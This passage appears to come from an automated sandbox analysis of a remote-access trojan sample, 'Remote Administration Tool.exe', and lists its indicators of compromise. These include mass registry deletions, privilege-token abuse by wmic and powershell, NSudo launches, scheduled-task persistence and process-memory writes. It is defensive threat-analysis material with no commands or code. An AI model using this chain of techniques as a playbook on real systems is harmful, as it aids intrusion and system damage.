Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.XGpuEjectDialog_cw5n1h2txyewy%5Cresources.pri\1d7e536746cabe0 Client.exe Key deleted \REGISTRY\USER\S-1-5-19\AppEvents\EventLabels\ChangeTheme Client.exe Key deleted \REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\.Default\Minimize\.Current Client.exe Key deleted \REGISTRY\USER\S-1-5-19\Console Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\1d5acdde7226641\a37dfe62 Client.exe Key deleted \REGISTRY\USER\S-1-5-20\AppEvents\EventLabels\WindowsUnlock Client.exe Key deleted \REGISTRY\USER\S-1-5-20\AppEvents\Schemes Client.exe Key deleted \REGISTRY\USER\S-1-5-20\AppEvents\EventLabels\EmptyRecycleBin Client.exe Key deleted \REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\.Default\SystemNotification\.Current Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Printers Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace4e9324c5f Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.ContentDeliveryManager_cw5n1h2txyewy%5Cresources.pri Client.exe Key deleted \REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\.Default\Notification.Looping.Call\.Default Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings Client.exe Key deleted \REGISTRY\USER\S-1-5-20\AppEvents\EventLabels\Notification.Default Client.exe Key deleted \REGISTRY\USER\S-1-5-20\AppEvents\Schemes\Apps\sapisvr\HubOffSound\.default Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace4a450ec0e Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri Client.exe Key deleted \REGISTRY\USER\S-1-5-20\AppEvents\EventLabels\Notification.Looping.Alarm4 Client.exe Key deleted \REGISTRY\USER\S-1-5-20\AppEvents\Schemes\Apps\.Default\Notification.Looping.Call8 Client.exe Key deleted \REGISTRY\USER\S-1-5-20\Network Client.exe Key deleted \REGISTRY\USER\S-1-5-19\AppEvents\EventLabels\Notification.Looping.Alarm3 Client.exe Key deleted \REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer Client.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace48ea9bf97\a37dfe62 Client.exe Key deleted \REGISTRY\USER\S-1-5-20\AppEvents\EventLabels\SystemExit Client.exe Key deleted \REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\.Default\MenuCommand Client.exe Key deleted \REGISTRY\USER\S-1-5-19\Control Panel\Input Method\Hot Keys\00000202 Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\1d7e53665b78b3b Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs Client.exe Key deleted \REGISTRY\USER\S-1-5-20\AppEvents\EventLabels\CriticalBatteryAlarm Client.exe Key deleted \REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\Explorer\SecurityBand\.current Client.exe Key deleted \REGISTRY\USER\S-1-5-20\AppEvents\EventLabels\SystemQuestion Client.exe Key deleted \REGISTRY\USER\S-1-5-20\AppEvents\Schemes\Apps\.Default\DeviceDisconnect Client.exe Key deleted \REGISTRY\USER\S-1-5-20\Control Panel\PowerCfg\PowerPolicies\3 Client.exe Key deleted \REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\.Default\DeviceConnect Client.exe Key deleted \REGISTRY\USER\S-1-5-19\Control Panel\International\Geo Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings Client.exe Key deleted \REGISTRY\USER\S-1-5-20\AppEvents\Schemes\Apps\.Default\PrintComplete Client.exe Key deleted \REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\.Default\Notification.Looping.Alarm Client.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache Client.exe Key deleted \REGISTRY\USER\S-1-5-20\AppEvents\Schemes\Apps\.Default\SystemQuestion\.Current Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\1d5acdddadc1b8f\a37dfe62 Client.exe Key deleted \REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\.Default\Notification.Looping.Alarm7 Client.exe Key deleted \REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\.Default\SystemAsterisk\.Default Client.exe Key deleted \REGISTRY\USER\S-1-5-20\AppEvents\Schemes\Apps\.Default\MessageNudge\.Current Client.exe Key deleted \REGISTRY\USER\S-1-5-20\AppEvents\Schemes\Apps\Explorer\FeedDiscovered\.default Client.exe -
Modifies registry class 64 IoCs
Processes:
Client.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0079-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0096-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Extensions\ContractId\Windows.File\PackageId\Microsoft.MicrosoftEdge_44.19041.1266.0_neutral__8wekyb3d8bbwe\ActivatableClassId\MicrosoftEdge.AppXxat4m5y1bf9ghax409y1vwyatpqea4s8.mca\Cust Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Microsoft.AsyncTextService_10.0.19041.1023_neutral__8wekyb3d8bbwe\ActivatableClassId\App.AppXp4wpase8zw5nnymbgr8d5yakzewpv9jj.mca\ Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\AppXbemgape21yns3k5pd4ah40jz06yq6xrk Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0014-0002-0025-ABCDEFFEDCBA} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0014-0002-0032-ABCDEFFEDCBA} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0070-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0009-ABCDEFFEDCBC} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\.nrw\OpenWithProgids Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0035-ABCDEFFEDCBB} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0049-ABCDEFFEDCBB} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0039-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0077-ABCDEFFEDCBB} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0033-ABCDEFFEDCBC} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\.mov Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0014-0001-0004-ABCDEFFEDCBA} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PolicyCache\Microsoft.WindowsCamera_8wekyb3d8bbwe Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0044-ABCDEFFEDCBB} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0014-0001-0000-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0026-ABCDEFFEDCBB} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0090-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0008-ABCDEFFEDCBB} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\AppX6006hzyfsdm0v5mhzsyjgvyh29vvj9sp\Shell Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0014-0002-0015-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0056-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0009-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0058-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0058-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0044-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Microsoft.Windows.PinningConfirmationDialog_1000.19041.1023.0_neutral__cw5n1h2txyewy\ActivatableClassId\App.AppXx1kd012aaxraxkw1dr Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\FileSyncClient.FileSyncClient\CLSID Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\FileSyncClient.FileSyncClient\CurVer Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0068-ABCDEFFEDCBB} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Extensions\ContractId\Windows.FileSavePicker\PackageId\c5e2524a-ea46-4f67-841f-6a9465d9d515_10.0.19041.1023_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\App\CustomProperties Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0014-0002-0040-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Extensions\ContractId\Windows.Launch\PackageId\Microsoft.Windows.XGpuEjectDialog_10.0.19041.1023_neutral_neutral_cw5n1h2txyewy Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0014-0002-0041-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0047-ABCDEFFEDCBC} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\JavaPlugin.11662\CLSID Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PolicyCache\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0068-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0025-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Extensions\ContractId\Windows.ComponentUI\PackageId\Microsoft.Windows.PeopleExperienceHost_10.0.19041.1023_neutral_neutral_cw5n1h2txyewy Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Extensions\ContractId\Windows.Protocol\PackageId\Microsoft.Windows.Apprep.ChxApp_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\AppXbemgape21yns3k5pd4ah40jz06yq6xrk\Application Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0014-0002-0036-ABCDEFFEDCBA} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0063-ABCDEFFEDCBB} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0043-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0020-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Extensions\ContractId\Windows.Protocol\PackageId\Microsoft.MicrosoftEdge_44.19041.1266.0_neutral__8wekyb3d8bbwe\ActivatableClassId Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0040-ABCDEFFEDCBB} Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0032-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Microsoft.Windows.ParentalControls_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\TypeLib Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0056-ABCDEFFEDCBA}\InprocServer32 Client.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
NSudo.exeNSudo.exeNSudo.exeNSudo.exeNSudo.exeNSudo.exeNSudo.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4948 NSudo.exe 4948 NSudo.exe 2152 NSudo.exe 2152 NSudo.exe 5056 NSudo.exe 5056 NSudo.exe 1112 NSudo.exe 1112 NSudo.exe 3152 NSudo.exe 3152 NSudo.exe 4940 NSudo.exe 4940 NSudo.exe 3652 NSudo.exe 3652 NSudo.exe 2400 powershell.exe 2400 powershell.exe 4304 powershell.exe 4304 powershell.exe 4832 powershell.exe 4832 powershell.exe 2956 powershell.exe 2956 powershell.exe 5076 powershell.exe 5076 powershell.exe 1656 powershell.exe 1656 powershell.exe 1528 powershell.exe 1528 powershell.exe 1764 powershell.exe 1764 powershell.exe 1504 powershell.exe 1504 powershell.exe 556 powershell.exe 556 powershell.exe 4608 powershell.exe 4608 powershell.exe 3024 powershell.exe 3024 powershell.exe 2808 powershell.exe 2808 powershell.exe 4636 powershell.exe 4636 powershell.exe 2420 powershell.exe 2420 powershell.exe 4252 powershell.exe 4252 powershell.exe 4520 powershell.exe 4520 powershell.exe 1532 powershell.exe 1532 powershell.exe 2208 powershell.exe 2208 powershell.exe 1536 powershell.exe 1536 powershell.exe 4076 powershell.exe 4076 powershell.exe 4492 powershell.exe 4492 powershell.exe 1212 powershell.exe 1212 powershell.exe 3412 powershell.exe 3412 powershell.exe 3936 powershell.exe 3936 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
Processes:
msedge.exepid process 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Remote Administration Tool.exeClient.exeNSudo.exeNSudo.exeNSudo.exeNSudo.exeNSudo.exeNSudo.exeNSudo.exeLtVS7J0Z7Ji8.exewmic.exepowershell.exepowershell.exewmic.exedescription pid process Token: SeDebugPrivilege 4156 Remote Administration Tool.exe Token: SeDebugPrivilege 4592 Client.exe Token: 18446744065119617044 4948 NSudo.exe Token: 18446744065119617044 2152 NSudo.exe Token: 18446744065119617044 5056 NSudo.exe Token: 18446744065119617044 1112 NSudo.exe Token: 18446744065119617044 3152 NSudo.exe Token: 18446744065119617044 4940 NSudo.exe Token: 18446744065119617044 3652 NSudo.exe Token: SeDebugPrivilege 3228 LtVS7J0Z7Ji8.exe Token: SeIncreaseQuotaPrivilege 4552 wmic.exe Token: SeSecurityPrivilege 4552 wmic.exe Token: SeTakeOwnershipPrivilege 4552 wmic.exe Token: SeLoadDriverPrivilege 4552 wmic.exe Token: SeSystemProfilePrivilege 4552 wmic.exe Token: SeSystemtimePrivilege 4552 wmic.exe Token: SeProfSingleProcessPrivilege 4552 wmic.exe Token: SeIncBasePriorityPrivilege 4552 wmic.exe Token: SeCreatePagefilePrivilege 4552 wmic.exe Token: SeBackupPrivilege 4552 wmic.exe Token: SeRestorePrivilege 4552 wmic.exe Token: SeShutdownPrivilege 4552 wmic.exe Token: SeDebugPrivilege 4552 wmic.exe Token: SeSystemEnvironmentPrivilege 4552 wmic.exe Token: SeRemoteShutdownPrivilege 4552 wmic.exe Token: SeUndockPrivilege 4552 wmic.exe Token: SeManageVolumePrivilege 4552 wmic.exe Token: 33 4552 wmic.exe Token: 34 4552 wmic.exe Token: 35 4552 wmic.exe Token: 36 4552 wmic.exe Token: SeIncreaseQuotaPrivilege 4552 wmic.exe Token: SeSecurityPrivilege 4552 wmic.exe Token: SeTakeOwnershipPrivilege 4552 wmic.exe Token: SeLoadDriverPrivilege 4552 wmic.exe Token: SeSystemProfilePrivilege 4552 wmic.exe Token: SeSystemtimePrivilege 4552 wmic.exe Token: SeProfSingleProcessPrivilege 4552 wmic.exe Token: SeIncBasePriorityPrivilege 4552 wmic.exe Token: SeCreatePagefilePrivilege 4552 wmic.exe Token: SeBackupPrivilege 4552 wmic.exe Token: SeRestorePrivilege 4552 wmic.exe Token: SeShutdownPrivilege 4552 wmic.exe Token: SeDebugPrivilege 4552 wmic.exe Token: SeSystemEnvironmentPrivilege 4552 wmic.exe Token: SeRemoteShutdownPrivilege 4552 wmic.exe Token: SeUndockPrivilege 4552 wmic.exe Token: SeManageVolumePrivilege 4552 wmic.exe Token: 33 4552 wmic.exe Token: 34 4552 wmic.exe Token: 35 4552 wmic.exe Token: 36 4552 wmic.exe Token: SeDebugPrivilege 2400 powershell.exe Token: SeDebugPrivilege 4304 powershell.exe Token: SeIncreaseQuotaPrivilege 224 wmic.exe Token: SeSecurityPrivilege 224 wmic.exe Token: SeTakeOwnershipPrivilege 224 wmic.exe Token: SeLoadDriverPrivilege 224 wmic.exe Token: SeSystemProfilePrivilege 224 wmic.exe Token: SeSystemtimePrivilege 224 wmic.exe Token: SeProfSingleProcessPrivilege 224 wmic.exe Token: SeIncBasePriorityPrivilege 224 wmic.exe Token: SeCreatePagefilePrivilege 224 wmic.exe Token: SeBackupPrivilege 224 wmic.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
Processes:
helppane.exemsedge.exepid process 676 helppane.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe 2360 msedge.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
Client.exehelppane.exepid process 4592 Client.exe 676 helppane.exe 676 helppane.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Remote Administration Tool.exeClient.execmd.exeLtVS7J0Z7Ji8.exeLtVS7J0Z7Ji8.execmd.execmd.exedescription pid process target process PID 4156 wrote to memory of 4976 4156 Remote Administration Tool.exe schtasks.exe PID 4156 wrote to memory of 4976 4156 Remote Administration Tool.exe schtasks.exe PID 4156 wrote to memory of 4592 4156 Remote Administration Tool.exe Client.exe PID 4156 wrote to memory of 4592 4156 Remote Administration Tool.exe Client.exe PID 4592 wrote to memory of 796 4592 Client.exe schtasks.exe PID 4592 wrote to memory of 796 4592 Client.exe schtasks.exe PID 3664 wrote to memory of 1664 3664 cmd.exe cacls.exe PID 3664 wrote to memory of 1664 3664 cmd.exe cacls.exe PID 3664 wrote to memory of 4300 3664 cmd.exe bitsadmin.exe PID 3664 wrote to memory of 4300 3664 cmd.exe bitsadmin.exe PID 3664 wrote to memory of 4948 3664 cmd.exe NSudo.exe PID 3664 wrote to memory of 4948 3664 cmd.exe NSudo.exe PID 3664 wrote to memory of 2152 3664 cmd.exe NSudo.exe PID 3664 wrote to memory of 2152 3664 cmd.exe NSudo.exe PID 3664 wrote to memory of 5056 3664 cmd.exe NSudo.exe PID 3664 wrote to memory of 5056 3664 cmd.exe NSudo.exe PID 3664 wrote to memory of 1112 3664 cmd.exe NSudo.exe PID 3664 wrote to memory of 1112 3664 cmd.exe NSudo.exe PID 3664 wrote to memory of 3152 3664 cmd.exe NSudo.exe PID 3664 wrote to memory of 3152 3664 cmd.exe NSudo.exe PID 3664 wrote to memory of 4940 3664 cmd.exe NSudo.exe PID 3664 wrote to memory of 4940 3664 cmd.exe NSudo.exe PID 3664 wrote to memory of 3652 3664 cmd.exe NSudo.exe PID 3664 wrote to memory of 3652 3664 cmd.exe NSudo.exe PID 4592 wrote to memory of 4404 4592 Client.exe LtVS7J0Z7Ji8.exe PID 4592 wrote to memory of 4404 4592 Client.exe LtVS7J0Z7Ji8.exe PID 4404 wrote to memory of 3228 4404 LtVS7J0Z7Ji8.exe LtVS7J0Z7Ji8.exe PID 4404 wrote to memory of 3228 4404 LtVS7J0Z7Ji8.exe LtVS7J0Z7Ji8.exe PID 3228 wrote to memory of 4552 3228 LtVS7J0Z7Ji8.exe wmic.exe PID 3228 wrote to memory of 4552 3228 LtVS7J0Z7Ji8.exe wmic.exe PID 3228 wrote to memory of 2400 3228 LtVS7J0Z7Ji8.exe powershell.exe PID 3228 wrote to memory of 2400 3228 LtVS7J0Z7Ji8.exe powershell.exe PID 3228 wrote to memory of 4304 3228 LtVS7J0Z7Ji8.exe powershell.exe PID 3228 wrote to memory of 4304 3228 LtVS7J0Z7Ji8.exe powershell.exe PID 3228 wrote to memory of 216 3228 LtVS7J0Z7Ji8.exe cmd.exe PID 3228 wrote to memory of 216 3228 LtVS7J0Z7Ji8.exe cmd.exe PID 3228 wrote to memory of 224 3228 LtVS7J0Z7Ji8.exe wmic.exe PID 3228 wrote to memory of 224 3228 LtVS7J0Z7Ji8.exe wmic.exe PID 3228 wrote to memory of 4832 3228 LtVS7J0Z7Ji8.exe powershell.exe PID 3228 wrote to memory of 4832 3228 LtVS7J0Z7Ji8.exe powershell.exe PID 216 wrote to memory of 1436 216 cmd.exe reg.exe PID 216 wrote to memory of 1436 216 cmd.exe reg.exe PID 3228 wrote to memory of 3644 3228 LtVS7J0Z7Ji8.exe cmd.exe PID 3228 wrote to memory of 3644 3228 LtVS7J0Z7Ji8.exe cmd.exe PID 3644 wrote to memory of 796 3644 cmd.exe reg.exe PID 3644 wrote to memory of 796 3644 cmd.exe reg.exe PID 3228 wrote to memory of 2956 3228 LtVS7J0Z7Ji8.exe powershell.exe PID 3228 wrote to memory of 2956 3228 LtVS7J0Z7Ji8.exe powershell.exe PID 3228 wrote to memory of 4824 3228 LtVS7J0Z7Ji8.exe wmic.exe PID 3228 wrote to memory of 4824 3228 LtVS7J0Z7Ji8.exe wmic.exe PID 3228 wrote to memory of 5076 3228 LtVS7J0Z7Ji8.exe powershell.exe PID 3228 wrote to memory of 5076 3228 LtVS7J0Z7Ji8.exe powershell.exe PID 3228 wrote to memory of 1656 3228 LtVS7J0Z7Ji8.exe powershell.exe PID 3228 wrote to memory of 1656 3228 LtVS7J0Z7Ji8.exe powershell.exe PID 3228 wrote to memory of 4636 3228 LtVS7J0Z7Ji8.exe wmic.exe PID 3228 wrote to memory of 4636 3228 LtVS7J0Z7Ji8.exe wmic.exe PID 3228 wrote to memory of 1528 3228 